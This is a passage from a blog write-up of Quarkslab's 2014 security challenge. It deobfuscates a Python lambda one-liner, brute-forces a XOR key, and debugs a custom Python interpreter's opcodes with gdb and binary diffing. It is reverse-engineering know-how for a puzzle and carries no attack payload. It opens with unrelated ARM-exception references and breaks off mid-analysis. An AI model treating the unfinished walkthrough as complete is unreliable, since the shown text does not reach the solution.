References

[1] Vector Rewrite Attack
[2] Recent ARM Security Improvements
[3] Entering an Exception
[4] SWI handlers
[5] ARM Exceptions
[6] Exception and Interrupt Handling in ARM

Dissection of Quarkslab's 2014 security challenge

Introduction

As the blog was a bit silent for quite some time, I figured it would be cool to put together a post ; so here it is folks, dig in!

The French company Quarkslab recently released a security challenge to win a free entrance to attend the upcoming HITBSecConf conference in Kuala Lumpur from the 13th of October until the 16th.

The challenge has been written by Serge Guelton, a R&D engineer specialized in compilers/parallel computations. At the time of writing, already eight different people manage to solve the challenge, and one of the ticket seems to have been won by hackedd, so congrats to him!

woot.png
According to the description of the challenge Python is heavily involved, which is a good thing for at least two reasons:

In this post I will describe how I tackled this problem, how I managed to solve it. And to make up for me being slow at solving it I tried to make it fairly detailed.

At first it was supposed to be quite short though, but well..I decided to analyze fully the challenge even if it wasn't needed to find the key unfortunately, so it is a bit longer than expected :-).

Anyway, sit down, make yourself at home and let me pour you a cup of tea before we begin :-).

Finding the URL of the challenge

Very one-liner, much lambdas, such a pain

The first part of the challenge is to retrieve an url hidden in the following Python one-liner:

(lambda g, c, d: (lambda _: (_.__setitem__('$', ''.join([(_['chr'] if ('chr'
in _) else chr)((_['_'] if ('_' in _) else _)) for _['_'] in (_['s'] if ('s'
in _) else s)[::(-1)]])), _)[-1])( (lambda _: (lambda f, _: f(f, _))((lambda
__,_: ((lambda _: __(__, _))((lambda _: (_.__setitem__('i', ((_['i'] if ('i'
in _) else i) + 1)),_)[(-1)])((lambda _: (_.__setitem__('s',((_['s'] if ('s'
in _) else s) + [((_['l'] if ('l' in _) else l)[(_['i'] if ('i' in _) else i
)] ^ (_['c'] if ('c' in _) else c))])), _)[-1])(_))) if (((_['g'] if ('g' in
_) else g) % 4) and ((_['i'] if ('i' in _) else i)< (_['len'] if ('len' in _
) else len)((_['l'] if ('l' in _) else l)))) else _)), _) ) ( (lambda _: (_.
__setitem__('!', []), _.__setitem__('s', _['!']), _)[(-1)] ) ((lambda _: (_.
__setitem__('!', ((_['d'] if ('d' in _) else d) ^ (_['d'] if ('d' in _) else
d))), _.__setitem__('i', _['!']), _)[(-1)])((lambda _: (_.__setitem__('!', [
(_['j'] if ('j' in _) else j) for  _[ 'i'] in (_['zip'] if ('zip' in _) else
zip)((_['l0'] if ('l0' in _) else l0), (_['l1'] if ('l1' in _) else l1)) for
_['j'] in (_['i'] if ('i' in _) else i)]), _.__setitem__('l', _['!']), _)[-1
])((lambda _: (_.__setitem__('!', [1373, 1281, 1288, 1373, 1290, 1294, 1375,
1371,1289, 1281, 1280, 1293, 1289, 1280, 1373, 1294, 1289, 1280, 1372, 1288,
1375,1375, 1289, 1373, 1290, 1281, 1294, 1302, 1372, 1355, 1366, 1372, 1302,
1360, 1368, 1354, 1364, 1370, 1371, 1365, 1362, 1368, 1352, 1374, 1365, 1302
]), _.__setitem__('l1',_['!']), _)[-1])((lambda _: (_.__setitem__('!',[1375,
1368, 1294, 1293, 1373, 1295, 1290, 1373, 1290, 1293, 1280, 1368, 1368,1294,
1293, 1368, 1372, 1292, 1290, 1291, 1371, 1375, 1280, 1372, 1281, 1293,1373,
1371, 1354, 1370, 1356, 1354, 1355, 1370, 1357, 1357, 1302, 1366, 1303,1368,
1354, 1355, 1356, 1303, 1366, 1371]), _.__setitem__('l0', _['!']), _)[(-1)])
            ({ 'g': g, 'c': c, 'd': d, '$': None})))))))['$'])

I think that was the first time I was seeing obfuscated Python and believe me I did a really strange face when seeing that snippet. But well, with a bit of patience we should manage to get a better understanding of how it is working, let's get to it!

Tidying up the last one..

Before doing that here are things we can directly observe just by looking closely at the snippet:

  • We know this function has three arguments ; we don't know them at this point though
  • The snippet seems to reuse __setitem__ quite a lot ; it may mean two things for us:
  • The only standard Python object I know of with a __setitem__ function is dictionary,
  • The way the snippet looks like, it seems that once we will understand one of those __setitem__ call, we will understand them all
  • The following standard functions are used: chr, len, zip
  • That means manipulation of strings, integers and iterables
  • There are two noticeable operators: mod and xor

With all that information in our sleeve, the first thing I did was to try to clean it up, starting from the last lambda in the snippet. It gives something like:

tab0 = [
    1375, 1368, 1294, 1293, 1373, 1295, 1290, 1373, 1290, 1293,
    1280, 1368, 1368, 1294, 1293, 1368, 1372, 1292, 1290, 1291,
    1371, 1375, 1280, 1372, 1281, 1293, 1373, 1371, 1354, 1370,
    1356, 1354, 1355, 1370, 1357, 1357, 1302, 1366, 1303, 1368,
    1354, 1355, 1356, 1303, 1366, 1371
]

z = lambda x: (
    x.__setitem__('!', tab0),
    x.__setitem__('l0', x['!']),
    x
)[-1]

That lambda takes a dictionary x, sets two items, generates a tuple with a reference to the dictionary at the end of the tuple ; finally the lambda is going to return that same dictionary. It also uses x['!'] as a temporary variable to then assign its value to x['l0'].

Long story short, it basically takes a dictionary, updates it and returns it to the caller: clever trick to pass that same object across lambdas. We can also see that easily in Python directly:

In [8]: d = {}
In [9]: z(d)
Out[9]:
{'!': [1375,
    ...
    'l0': [1375,
    ...
}

That lambda is even called with a dictionary that will contain, among other things, the three user controlled variable: g, c, d. That dictionary seems to be some kind of storage used to keep track of all the variables that will be used across those lambdas.

# Returns { 'g' : g, 'c', 'd': d, '$':None, '!':tab0, 'l0':tab0}
last_res = (
    (
        lambda x: (
            x.__setitem__('!', tab0),
            x.__setitem__('l0', x['!']),
            x
        )[-1]
    )
    ({ 'g': g, 'c': c, 'd': d, '$': None})
)

..then the one before...

Now if we repeat that same operation with the one before the last lambda, we have the exact same pattern:

tab1 = [
    1373, 1281, 1288, 1373, 1290, 1294, 1375, 1371, 1289, 1281,
    1280, 1293, 1289, 1280, 1373, 1294, 1289, 1280, 1372, 1288,
    1375, 1375, 1289, 1373, 1290, 1281, 1294, 1302, 1372, 1355,
    1366, 1372, 1302, 1360, 1368, 1354, 1364, 1370, 1371, 1365,
    1362, 1368, 1352, 1374, 1365, 1302
]

zz = lambda x: (
    x.__setitem__('!', tab1),
    x.__setitem__('l1', x['!']),
    x
)[-1]

Perfect, now let's repeat the same operations over and over again. At some point, the whole thing becomes crystal clear (sort-of):

# Returns { 
    # 'g':g, 'c':c, 'd':d,
    # '!':[],
    # 's':[],
    # 'l':[j for i in zip(tab0, tab1) for j in i],
    # 'l1':tab1,
    # 'l0':tab0,
    # 'i': 0,
    # 'j': 1302,
    # '$':None
#}
res_after_all_operations = (
    (
    lambda x: (
        x.__setitem__('!', []),
        x.__setitem__('s', x['!']),
        x
    )[-1]
    )
    # ..
    (
    (
        lambda x: (
            x.__setitem__('!', ((x['d'] if ('d' in x) else d) ^ (x['d'] if ('d' in x) else d))),
            x.__setitem__('i', x['!']),
            x
        )[-1]
    )
    # ..
    (
        (
        lambda x: (
            x.__setitem__('!', [(x['j'] if ('j' in x) else j) for x[ 'i'] in (x['zip'] if ('zip' in x) else zip)((x['l0'] if ('l0' in x) else l0), (x['l1'] if ('l1' in x) else l1)) for x['j'] in (x['i'] if ('i' in x) else i)]),
            x.__setitem__('l', x['!']),
            x
        )[-1]
        )
        # Returns { 'g':g, 'c':c, 'd':d, '!':tab1, 'l1':tab1, 'l0':tab0, '$':None}
        (
        (
            lambda x: (
                x.__setitem__('!', tab1),
                x.__setitem__('l1', x['!']),
                x
            )[-1]
        )
        # Return { 'g' : g, 'c', 'd': d, '!':tab0, 'l0':tab0, '$':None }
        (
            (
            lambda x: (
                x.__setitem__('!', tab0),
                x.__setitem__('l0', x['!']),
                x
            )[-1]
            )
            ({ 'g': g, 'c': c, 'd': d, '$': None})
        )
        )
    )
    )
)

Putting it all together

After doing all of that, we know now the types of the three variables the function needs to work properly (and we don't really need more to be honest):

  • g is an integer that will be mod 4
  • if the value is divisible by 4, the function returns nothing ; so we will need to have this variable sets to 1 for example
  • c is another integer that looks like a xor key ; if we look at the snippet, this variable is used to xor each byte of x['l'] (which is the table with tab0 and tab1)
  • this is the interesting parameter
  • d is another integer that we can also ignore: it's only used to set x['i'] to zero by xoring x['d'] by itself.

We don't need anything else really now: no more lambdas, no more pain, no more tears. It is time to write what I call, an educated brute-forcer, to find the correct value of c:

import sys

def main(argc, argv):
    tab0 = [1375, 1368, 1294, 1293, 1373, 1295, 1290, 1373, 1290, 1293, 1280, 1368, 1368,1294, 1293, 1368, 1372, 1292, 1290, 1291, 1371, 1375, 1280, 1372, 1281, 1293,1373, 1371, 1354, 1370, 1356, 1354, 1355, 1370, 1357, 1357, 1302, 1366, 1303,1368, 1354, 1355, 1356, 1303, 1366, 1371]
    tab1 = [1373, 1281, 1288, 1373, 1290, 1294, 1375, 1371,1289, 1281, 1280, 1293, 1289, 1280, 1373, 1294, 1289, 1280, 1372, 1288, 1375,1375, 1289, 1373, 1290, 1281, 1294, 1302, 1372, 1355, 1366, 1372, 1302, 1360, 1368, 1354, 1364, 1370, 1371, 1365, 1362, 1368, 1352, 1374, 1365, 1302]

    func = (
        lambda g, c, d: 
        (
            lambda x: (
                x.__setitem__('$', ''.join([(x['chr'] if ('chr' in x) else chr)((x['_'] if ('_' in x) else x)) for x['_'] in (x['s'] if ('s' in x) else s)[::-1]])),
                x
            )[-1]
        )
        (
            (
                lambda x: 
                    (lambda f, x: f(f, x))
                (
                    (
                        lambda __, x: 
                        (
                            (lambda x: __(__, x))
                            (
                                # i += 1
                                (
                                    lambda x: (
                                        x.__setitem__('i', ((x['i'] if ('i' in x) else i) + 1)),
                                        x
                                    )[-1]
                                )
                                (
                                    # s += [c ^ l[i]]
                                    (
                                        lambda x: (
                                            x.__setitem__('s', (
                                                    (x['s'] if ('s' in x) else s) +
                                                    [((x['l'] if ('l' in x) else l)[(x['i'] if ('i' in x) else i)] ^ (x['c'] if ('c' in x) else c))]
                                                )
                                            ),
                                            x
                                        )[-1]
                                    )
                                    (x)
                                )
                            )
                            # if ((x['g'] % 4) and (x['i'] < len(l))) else x
                            if (((x['g'] if ('g' in x) else g) % 4) and ((x['i'] if ('i' in x) else i)< (x['len'] if ('len' in x) else len)((x['l'] if ('l' in x) else l))))
                            else x
                        )
                    ),
                    x
                )
            )
            # Returns { 'g':g, 'c':c, 'd':d, '!':zip(tab1, tab0), 'l':zip(tab1, tab0), l1':tab1, 'l0':tab0, 'i': 0, 'j': 1302, '!':0, 's':[] }
            (
                (
                    lambda x: (
                        x.__setitem__('!', []),
                        x.__setitem__('s', x['!']),
                        x
                    )[-1]
                )
                # Returns { 'g':g, 'c':c, 'd':d, '!':zip(tab1, tab0), 'l':zip(tab1, tab0), l1':tab1, 'l0':tab0, 'i': 0, 'j': 1302, '!':0}
                (
                    (
                        lambda x: (
                            x.__setitem__('!', ((x['d'] if ('d' in x) else d) ^ (x['d'] if ('d' in x) else d))),
                            x.__setitem__('i', x['!']),
                            x
                        )[-1]
                    )
                    # Returns { 'g' : g, 'c', 'd': d, '!':zip(tab1, tab0), 'l':zip(tab1, tab0), l1':tab1, 'l0':tab0, 'i': (1371, 1302), 'j': 1302}
                    (
                        (
                            lambda x: (
                                x.__setitem__('!', [(x['j'] if ('j' in x) else j) for x[ 'i'] in (x['zip'] if ('zip' in x) else zip)((x['l0'] if ('l0' in x) else l0), (x['l1'] if ('l1' in x) else l1)) for x['j'] in (x['i'] if ('i' in x) else i)]),
                                x.__setitem__('l', x['!']),
                                x
                            )[-1]
                        )
                        # Returns { 'g' : g, 'c', 'd': d, '!':tab1, 'l1':tab1, 'l0':tab0}
                        (
                            (
                                lambda x: (
                                    x.__setitem__('!', tab1),
                                    x.__setitem__('l1', x['!']),
                                    x
                                )[-1]
                            )
                            # Return { 'g' : g, 'c', 'd': d, '!' : tab0, 'l0':tab0}
                            (
                                (
                                    lambda x: (
                                        x.__setitem__('!', tab0),
                                        x.__setitem__('l0', x['!']),
                                        x
                                    )[-1]
                                )
                                ({ 'g': g, 'c': c, 'd': d, '$': None})
                            )
                        )
                    )
                )
            )
        )['$']
    )

    for i in range(0x1000):
        try:
            ret = func(1, i, 0)
            if 'quarks' in ret:
                print ret
        except:
            pass
    return 1

if __name__ == '__main__':
    sys.exit(main(len(sys.argv), sys.argv))

And after running it, we are good to go:

D:\Codes\challenges\ql-python>bf_with_lambdas_cleaned.py
/blog.quarkslab.com/static/resources/b7d8438de09fffb12e3950e7ad4970a4a998403bdf3763dd4178adf

A custom ELF64 Python interpreter you shall debug

Recon

All right, here we are: we now have the real challenge. First, let's see what kind of information we get for free:

overclok@wildout:~/chall/ql-py$ file b7d8438de09fffb12e3950e7ad4970a4a998403bdf3763dd4178adf
b7d8438de09fffb12e3950e7ad4970a4a998403bdf3763dd4178adf: ELF 64-bit LSB  executable, x86-64, version 1 (SYSV), dynamically linked (uses shared libs),
for GNU/Linux 2.6.26, not stripped

overclok@wildout:~/chall/ql-py$ ls -lah b7d8438de09fffb12e3950e7ad4970a4a998403bdf3763dd4178adf
-rwxrw-r-x 1 overclok overclok 7.9M Sep  8 21:03 b7d8438de09fffb12e3950e7ad4970a4a998403bdf3763dd4178adf

The binary is quite big, not good for us. But on the other hand, the binary isn't stripped so we might find useful debugging information at some point.

overclok@wildout:~/chall/ql-py$ /usr/bin/b7d8438de09fffb12e3950e7ad4970a4a998403bdf3763dd4178adf
Python 2.7.8+ (nvcs/newopcodes:a9bd62e4d5f2+, Sep  1 2014, 11:41:46)
[GCC 4.8.2] on linux2
Type "help", "copyright", "credits" or "license" for more information.
>>>

That does explain the size of the binary then: we basically have something that looks like a custom Python interpreter. Note that I also remembered reading Building an obfuscated Python interpreter: we need more opcodes on Quarkslab's blog where Serge described how you could tweak the interpreter sources to add / change some opcodes either for optimization or obfuscation purposes.

Finding the interesting bits

The next step is to figure out what part of the binary is interesting, what functions have been modified, and where we find the problem we need to solve to get the flag. My idea for that was to use a binary-diffing tool between an original Python278 interpreter and the one we were given.

To do so I just grabbed Python278's sources and compiled them by myself:

overclok@wildout:~/chall/ql-py$ wget https://www.python.org/ftp/python/2.7.8/Python-2.7.8.tgz && tar xzvf Python-2.7.8.tgz

overclok@wildout:~/chall/ql-py$ tar xzvf Python-2.7.8.tgz

overclok@wildout:~/chall/ql-py$ cd Python-2.7.8/ && ./configure && make

overclok@wildout:~/chall/ql-py/Python-2.7.8$ ls -lah ./python
-rwxrwxr-x 1 overclok overclok 8.0M Sep  5 00:13 ./python

The resulting binary has a similar size, so it should do the job even if I'm not using GCC 4.8.2 and the same compilation/optimization options. To perform the diffing I used IDA Pro and Patchdiff v2.0.10.

---------------------------------------------------
PatchDiff Plugin v2.0.10
Copyright (c) 2010-2011, Nicolas Pouvesle
Copyright (C) 2007-2009, Tenable Network Security, Inc
---------------------------------------------------

Scanning for functions ...
parsing second idb...
parsing first idb...
diffing...
Identical functions:   2750
Matched functions:     176
Unmatched functions 1: 23
Unmatched functions 2: 85
done!

Once the tool has finished its analysis we just have to check the list of unmatched function names (around one hundred of them, so it's pretty quick), and eventually we see that:

initdo_not_run_me.png
That function directly caught my eyes (you can even check it doesn't exist in the Python278 source tree obviously :-)), and it appears this function is just setting up a Python module called do_not_run_me.

initdonotrunme_assembly.png
Let's import it:
overclok@wildout:~/chall/ql-py$ /usr/bin/b7d8438de09fffb12e3950e7ad4970a4a998403bdf3763dd4178adf
iPython 2.7.8+ (nvcs/newopcodes:a9bd62e4d5f2+, Sep  1 2014, 11:41:46)
[GCC 4.8.2] on linux2
Type "help", "copyright", "credits" or "license" for more information.
>>> import do_not_run_me
>>> print do_not_run_me.__doc__
None
>>> dir(do_not_run_me)
['__doc__', '__name__', '__package__', 'run_me']
>>> print do_not_run_me.run_me.__doc__
There are two kinds of people in the world: those who say there is no such thing as infinite recursion, and those who say ``There are two kinds of people in the world: those who say there is no such thing as infinite recursion, and those who say ...
>>> do_not_run_me.run_me('doar-e')
Segmentation fault

All right, we now have something to look at and we are going to do so from a low level point of view because that's what I like ; so don't expect big/magic hacks here :).

If you are not really familiar with Python's VM structures I would advise you to read quickly through this article Deep Dive Into Python’s VM: Story of LOAD_CONST Bug, and you should be all set for the next parts.

do_not_run_me.run_me

The function is quite small, so it should be pretty quick to analyze:

  1. the first part makes sure that we pass a string as an argument when calling run_me,
  2. then a custom marshaled function is loaded, a function is created out of it, and called,
  3. after that it creates another function from the string we pass to the function (which explains the segfault just above),
  4. finally, a last function is created from another hardcoded marshaled string.

First marshaled function

To understand it we have to dump it first, to unmarshal it and to analyze the resulting code object:

overclok@wildout:~/chall/ql-py$ gdb -q /usr/bin/b7d8438de09fffb12e3950e7ad4970a4a998403bdf3763dd4178adf
Reading symbols from /usr/bin/b7d8438de09fffb12e3950e7ad4970a4a998403bdf3763dd4178adf...done.
gdb$ set disassembly-flavor intel
gdb$ disass run_me
Dump of assembler code for function run_me:
    0x0000000000513d90 <+0>:     push   rbp
    0x0000000000513d91 <+1>:     mov    rdi,rsi
    0x0000000000513d94 <+4>:     xor    eax,eax
    0x0000000000513d96 <+6>:     mov    esi,0x56c70b
    0x0000000000513d9b <+11>:    push   rbx
    0x0000000000513d9c <+12>:    sub    rsp,0x28
    0x0000000000513da0 <+16>:    lea    rcx,[rsp+0x10]
    0x0000000000513da5 <+21>:    mov    rdx,rsp

    ; Parses the arguments we gave, it expects a string object
    0x0000000000513da8 <+24>:    call   0x4cf430 <PyArg_ParseTuple>
    0x0000000000513dad <+29>:    xor    edx,edx
    0x0000000000513daf <+31>:    test   eax,eax
    0x0000000000513db1 <+33>:    je     0x513e5e <run_me+206>

    0x0000000000513db7 <+39>:    mov    rax,QWORD PTR [rip+0x2d4342]
    0x0000000000513dbe <+46>:    mov    esi,0x91
    0x0000000000513dc3 <+51>:    mov    edi,0x56c940
    0x0000000000513dc8 <+56>:    mov    rax,QWORD PTR [rax+0x10]
    0x0000000000513dcc <+60>:    mov    rbx,QWORD PTR [rax+0x30]

    ; Creates a code object from the marshaled string
    ; PyObject* PyMarshal_ReadObjectFromString(char *string, Py_ssize_t len)
    0x0000000000513dd0 <+64>:    call   0x4dc020 <PyMarshal_ReadObjectFromString> 
    0x0000000000513dd5 <+69>:    mov    rdi,rax
    0x0000000000513dd8 <+72>:    mov    rsi,rbx

    ; Creates a function object from the marshaled string
    0x0000000000513ddb <+75>:    call   0x52c630 <PyFunction_New>
    0x0000000000513de0 <+80>:    xor    edi,edi
[...]
gdb$ r -c 'import do_not_run_me as v; v.run_me("")'
Starting program: /usr/bin/b7d8438de09fffb12e3950e7ad4970a4a998403bdf3763dd4178adf -c 'import do_not_run_me as v; v.run_me("")'
[...]

To start, we can set two software breakpoints @0x0000000000513dd0 and @0x0000000000513dd5 to inspect both the marshaled string and the resulting code object.

Just a little reminder though on the Linux/x64 ABI: "The first six integer or pointer arguments are passed in registers RDI, RSI, RDX, RCX, R8, and R9".

gdb$ p /x $rsi
$2 = 0x91

gdb$ x/145bx $rdi
0x56c940 <+00>:  0x63    0x00    0x00    0x00    0x00    0x01    0x00    0x00
0x56c948 <+08>:  0x00    0x02    0x00    0x00    0x00    0x43    0x00    0x00
0x56c950 <+16>:  0x00    0x73    0x14    0x00    0x00    0x00    0x64    0x01
0x56c958 <+24>:  0x00    0x87    0x00    0x00    0x7c    0x00    0x00    0x64
0x56c960 <+32>:  0x01    0x00    0x3c    0x61    0x00    0x00    0x7c    0x00
0x56c968 <+40>:  0x00    0x1b    0x28    0x02    0x00    0x00    0x00    0x4e
0x56c970 <+48>:  0x69    0x01    0x00    0x00    0x00    0x28    0x01    0x00
0x56c978 <+56>:  0x00    0x00    0x74    0x04    0x00    0x00    0x00    0x54
0x56c980 <+64>:  0x72    0x75    0x65    0x28    0x01    0x00    0x00    0x00
0x56c988 <+72>:  0x74    0x0e    0x00    0x00    0x00    0x52    0x6f    0x62
0x56c990 <+80>:  0x65    0x72    0x74    0x5f    0x46    0x6f    0x72    0x73
0x56c998 <+88>:  0x79    0x74    0x68    0x28    0x00    0x00    0x00    0x00
0x56c9a0 <+96>:  0x28    0x00    0x00    0x00    0x00    0x73    0x10    0x00
0x56c9a8 <+104>: 0x00    0x00    0x6f    0x62    0x66    0x75    0x73    0x63
0x56c9b0 <+112>: 0x61    0x74    0x65    0x2f    0x67    0x65    0x6e    0x2e
0x56c9b8 <+120>: 0x70    0x79    0x74    0x03    0x00    0x00    0x00    0x66
0x56c9c0 <+128>: 0x6f    0x6f    0x05    0x00    0x00    0x00    0x73    0x06
0x56c9c8 <+136>: 0x00    0x00    0x00    0x00    0x01    0x06    0x02    0x0a
0x56c9d0 <+144>: 0x01

And obviously you can't use the Python marshal module to load & inspect the resulting object as the author seems to have removed the methods loads and dumps:

overclok@wildout:~/chall/ql-py$ /usr/bin/b7d8438de09fffb12e3950e7ad4970a4a998403bdf3763dd4178adf
Python 2.7.8+ (nvcs/newopcodes:a9bd62e4d5f2+, Sep  1 2014, 11:41:46)
[GCC 4.8.2] on linux2
Type "help", "copyright", "credits" or "license" for more information.
>>> import marshal
>>> dir(marshal)
['__doc__', '__name__', '__package__', 'version']

We could still try to run the marshaled string in our fresh compiled original Python though:

>>> import marshal
>>> part_1 = marshal.loads('c\x00\x00\x00\x00\x01\x00\x00\x00\x02\x00\x00\x00C\x00\x00\x00s\x14\x00\x00\x00d\x01\x00\x87\x00\x00|\x00\x00d\x01\x00<a\x00\x00|\x00\x00\x1b(\x02\x00\x00\x00Ni\x01\x00\x00\x00(\x01\x00\x00\x00t\x04\x00\x00\x00True(\x01\x00\x00\x00t\x0e\x00\x00\x00Robert_Forsyth(\x00\x00\x00\x00(\x00\x00\x00\x00s\x10\x00\x00\x00obfuscate/gen.pyt\x03\x00\x00\x00foo\x05\x00\x00\x00s\x06\x00\x00\x00\x00\x01\x06\x02\n\x01')
>>> part_1.co_code
'd\x01\x00\x87\x00\x00|\x00\x00d\x01\x00<a\x00\x00|\x00\x00\x1b'
>>> part_1.co_varnames
('Robert_Forsyth',)
>>> part_1.co_names
('True',)

We can also go further by trying to create a function out of this code object, to call it and/or to disassemble it even:

>>> from types import FunctionType
>>> def a():
...     pass
...
>>> f = FunctionType(part_1, a.func_globals)
>>> f()
Traceback (most recent call last):
    File "<stdin>", line 1, in <module>
    File "obfuscate/gen.py", line 8, in foo
UnboundLocalError: local variable 'Robert_Forsyth' referenced before assignment
>>> import dis
>>> dis.dis(f)
    6           0 LOAD_CONST               1 (1)
                3 LOAD_CLOSURE             0
Traceback (most recent call last):
    File "<stdin>", line 1, in <module>
    File "/home/overclok/chall/ql-py/Python-2.7.8/Lib/dis.py", line 43, in dis
    disassemble(x)
    File "/home/overclok/chall/ql-py/Python-2.7.8/Lib/dis.py", line 107, in disassemble
    print '(' + free[oparg] + ')',
IndexError: tuple index out of range

Introducing dpy.py

All right, as expected this does not work at all: seems like the custom interpreter uses different opcodes which the original virtual CPU doesn't know about. Anyway, let's have a look at this object directly from memory because we like low level things (remember?):

gdb$ p *(PyObject*)$rax
$3 = {ob_refcnt = 0x1, ob_type = 0x7d3da0 <PyCode_Type>}

; Ok it is a code object, let's dump entirely the object now
gdb$ p *(PyCodeObject*)$rax
$4 = {
    ob_refcnt = 0x1,
    ob_type = 0x7d3da0 <PyCode_Type>,
    co_argcount = 0x0, co_nlocals = 0x1, co_stacksize = 0x2, co_flags = 0x43,
    co_code = 0x7ffff7f09df0,
    co_consts = 0x7ffff7ee2908,
    co_names = 0x7ffff7f8e390,
    co_varnames = 0x7ffff7f09ed0,
    co_freevars = 0x7ffff7fa7050, co_cellvars = 0x7ffff7fa7050,
    co_filename = 0x7ffff70a9b58,
    co_name = 0x7ffff7f102b0,
    co_firstlineno = 0x5,
    co_lnotab = 0x7ffff7e59900,
    co_zombieframe = 0x0,
    co_weakreflist = 0x0
}

Perfect, and you can do that for every single field of this structure:

  • to dump the bytecode,
  • the constants used,
  • the variable names,
  • etc.

Yes, this is annoying, very much so. That is exactly why there is dpy, a GDB Python command I wrote to dump Python objects in a much easy way directly from memory:

gdb$ r
Starting program: /usr/bin/b7d8438de09fffb12e3950e7ad4970a4a998403bdf3763dd4178adf
[...]
>>> a = { 1 : [1,2,3], 'two' : 31337, 3 : (1,'lul', [3,4,5])}
>>> print hex(id(a))
0x7ffff7ef1050
>>> ^C
Program received signal SIGINT, Interrupt.
gdb$ dpy 0x7ffff7ef1050
dict -> {1: [1, 2, 3], 3: (1, 'lul', [3, 4, 5]), 'two': 31337}

I need a disassembler now dad

But let's get back to our second breakpoint now, and see what dpy gives us with the resulting code object:

gdb$ dpy $rax
code -> {'co_code': 'd\x01\x00\x87\x00\x00|\x00\x00d\x01\x00<a\x00\x00|\x00\x00\x1b',
    'co_consts': (None, 1),
    'co_name': 'foo',
    'co_names': ('True',),
    'co_varnames': ('Robert_Forsyth',)}

Because we know the bytecode used by this interpreter is different than the original one, we have to figure out the equivalent between the instructions and their opcodes:

  1. Either we can reverse-engineer each handler of the virtual CPU,
  2. Either we can create functions in both interpreters, disassemble those (thanks to dpy) and match the equivalent opcodes

I guess we can mix both of them to be more efficient:

Python 2.7.8 (default, Sep  5 2014, 00:13:07)
[GCC 4.8.2] on linux2
Type "help", "copyright", "credits" or "license" for more information.
>>> def assi(x):
...     x = 'hu'
...
>>> def add(x):
...     return x + 31337
...
>>> import dis
>>> dis.dis(assi)
    2           0 LOAD_CONST               1 ('hu')
                3 STORE_FAST               0 (x)
                6 LOAD_CONST               0 (None)
                9 RETURN_VALUE
>>> dis.dis(add)
    2           0 LOAD_FAST                0 (x)
                3 LOAD_CONST               1 (31337)
                6 BINARY_ADD
                7 RETURN_VALUE
>>> assi.func_code.co_code
'd\x01\x00}\x00\x00d\x00\x00S'
>>> add.func_code.co_code
'|\x00\x00d\x01\x00\x17S'

# In the custom interpreter

gdb$ r
Starting program: /usr/bin/b7d8438de09fffb12e3950e7ad4970a4a998403bdf3763dd4178adf
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1".
Python 2.7.8+ (nvcs/newopcodes:a9bd62e4d5f2+, Sep  1 2014, 11:41:46)
[GCC 4.8.2] on linux2
Type "help", "copyright", "credits" or "license" for more information.
>>> def assi(x):
...     x = 'hu'
...
>>> def add(x):
...     return x + 31337
...
>>> print hex(id(assi))
0x7ffff7f0c578
>>> print hex(id(add))
0x7ffff7f0c5f0
>>> ^C
Program received signal SIGINT, Interrupt.
gdb$ dpy 0x7ffff7f0c578
function -> {'func_code': {'co_code': 'd\x01\x00\x87\x00\x00d\x00\x00\x1b',
                'co_consts': (None, 'hu'),
                'co_name': 'assi',
                'co_names': (),
                'co_varnames': ('x',)},
    'func_dict': None,
    'func_doc': None,
    'func_module': '__main__',
    'func_name': 'assi'}
gdb$ dpy 0x7ffff7f0c5f0
function -> {'func_code': {'co_code': '\x8f\x00\x00d\x01\x00=\x1b',
                'co_consts': (None, 31337),
                'co_name': 'add',
                'co_names': (),
                'co_varnames': ('x',)},
    'func_dict': None,
    'func_doc': None,
    'func_module': '__main__',
    'func_name': 'add'}

    # From here we have:
    # 0x64 -> LOAD_CONST
    # 0x87 -> STORE_FAST
    # 0x1b -> RETURN_VALUE
    # 0x8f -> LOAD_FAST
    # 0x3d -> BINARY_ADD

OK I think you got the idea, and if you don't manage to find all of them you can just debug the virtual CPU by putting a software breakpoint @0x4b0960:

=> 0x4b0923 <PyEval_EvalFrameEx+867>:   movzx  eax,BYTE PTR [r13+0x0]

For the interested readers: there is at least one interesting opcode that you wouldn't find in a normal Python interpreter, check what 0xA0 is doing especially when followed by 0x87 :-).

Back to the first marshaled function with all our tooling now

Thanks to our disassembler.py, we can now disassemble easily the first part:

PS D:\Codes\ql-chall-python-2014> python .\disassembler_ql_chall.py
    6           0 LOAD_CONST               1 (1)
                3 STORE_FAST               0 (Robert_Forsyth)

    8           6 LOAD_GLOBAL              0 (True)
                9 LOAD_CONST               1 (1)
                12 INPLACE_ADD
                13 STORE_GLOBAL             0 (True)

    9          16 LOAD_GLOBAL              0 (True)
                19 RETURN_VALUE
================================================================================

It seems the author has been really (too) kind with us: the function is really small and we can rewrite it in Python straightaway:

def part1():
    global True
    Robert_Forsyth = 1
    True += 1

You can also make sure with dpy that the code of part1 is the exact same than the unmarshaled function we dumped earlier.

>>> def part_1():
...  global True
...  Robert_Forsyth = 1
...  True += 1
...
>>> print hex(id(part_1))
0x7ffff7f0f578
>>> ^C
Program received signal SIGINT, Interrupt.
gdb$ dpy 0x7ffff7f0f578
function -> {'func_code': {'co_code': 'd\x01\x00\x87\x00\x00|\x00\x00d\x01\x00<a\x00\x00d\x00\x00\x1b',
                'co_consts': (None, 1),
                'co_name': 'part_1',
                'co_names': ('True',),
                'co_varnames': ('Robert_Forsyth',)},
    'func_dict': None,
    'func_doc': None,
    'func_module': '__main__',
    'func_name': 'part_1'}

Run my bytecode

The second part is also quite simple according to the following disassembly:

gdb$ disass run_me
Dump of assembler code for function run_me:
[...]
    ; Parses the arguments we gave, it expects a string object
    0x0000000000513da0 <+16>:    lea    rcx,[rsp+0x10]
    0x0000000000513da5 <+21>:    mov    rdx,rsp
    0x0000000000513da8 <+24>:    call   0x4cf430 <PyArg_ParseTuple>
    0x0000000000513dad <+29>:    xor    edx,edx
    0x0000000000513daf <+31>:    test   eax,eax
    0x0000000000513db1 <+33>:    je     0x513e5e <run_me+206>

    0x0000000000513db7 <+39>:    mov    rax,QWORD PTR [rip+0x2d4342]
    0x0000000000513dbe <+46>:    mov    esi,0x91
    0x0000000000513dc3 <+51>:    mov    edi,0x56c940
    0x0000000000513dc8 <+56>:    mov    rax,QWORD PTR [rax+0x10]
    0x0000000000513dcc <+60>:    mov    rbx,QWORD PTR [rax+0x30]

[...]
    ; Part1
[...]

    0x0000000000513df7 <+103>:   mov    rsi,QWORD PTR [rsp+0x10]
    0x0000000000513dfc <+108>:   mov    rdi,QWORD PTR [rsp]
    ; Uses the string passed as argument to run_me as a marshaled object
